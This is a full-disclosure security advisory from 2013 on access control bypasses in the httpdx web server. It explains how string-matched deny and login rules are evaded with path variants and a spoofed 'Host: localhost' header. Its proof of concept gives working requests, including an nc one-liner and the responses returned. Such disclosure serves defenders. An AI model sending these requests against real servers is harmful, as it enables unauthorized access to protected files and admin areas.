JAHx131 - httpdx multiple access control bypass

--------------------------------------------------------------------------------------------
20130212 - Justanotherhacker.com : httpdx multiple access control bypass
JAHx131 - http://www.justanotherhacker.com/advisories/JAHx131.txt
--------------------------------------------------------------------------------------------

Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with
only few threads. Includes directory listing, virtual hosting, basic auth., support for PHP,
Perl, Python, SSI, etc. All settings in one config/script file.
[ Taken from: http://sourceforge.net/projects/httpdx/ ]


--- Vulnerability description ---
Access control in httpdx is done with string matching directives in the configuration file.
Request variables are compared to static strings to determine if access should be granted.
Examples provided in the default configuration include:
    if<%REQUEST_URI% == "/data/users.txt*">{
        http.deny = 1;
    }
And another example:
    if<%REQUEST_URI% == "/admin.html*">{
        http.auth = { //authorization needed for admin's section
            user="admin",
            pass="passw000",
            realm="Stuff for admin only!"
        };
As long as your request does not match these static strings, but the path resolves to the same
files you can access the content.

Additionally, as the server doesn't support traditional binding of virtualhosts to network
interfaces you must configure virtualhost specific behaviour through similar string matching
directives.
    if<%HTTP_HOST% != "127.0.0.1" && %HTTP_HOST% == {localhost,127.*.*.*}>{
The variable HTTP_HOST is set from the Host: header in the request, so in order to access the
localhost virtualhost remotely, just set your Host: header to localhost.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Access control bypass
Severity: Low
Release: Full disclosure
CVE: None
Vendor: httpdx - http://sourceforge.net/projects/httpdx/
Affected versions: 1.5.5, 1.5.4 and probably earlier versions

--- Proof of Concept ---
The server comes with two examples of access control, a restricted file and a password
protected administrator area running on localhost. The following examples successfully
access these restricted areas remotely:

Access user file:
user@~$ GET http://192.168.58.135/data//users.txt
user1=pass123
user2=pass321

Access admin console:
user@~$ echo -e "GET /%2fadmin.html HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 192.168.58.135 80
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2012 03:25:58 GMT
Content-Type: text/html
Last-Modified: Mon, 20 Jul 2009 14:03:48 GMT
Content-Length: 36
Connection: close
Server: httpdx/1.5.4 (Win32)
Pragma: no-cache

Ok, you're now at admin's section.


--- Solution ---
The software appears to be abandoned and the same versions suffers from remote code execution
bugs. Use different software instead.

--- Disclosure time line ---
12-Feb-2013 - Public disclosure

No Clean Feed - Stop Internet Censorship in Australia
Creative Commons License
This weblog is licensed under a Creative Commons License.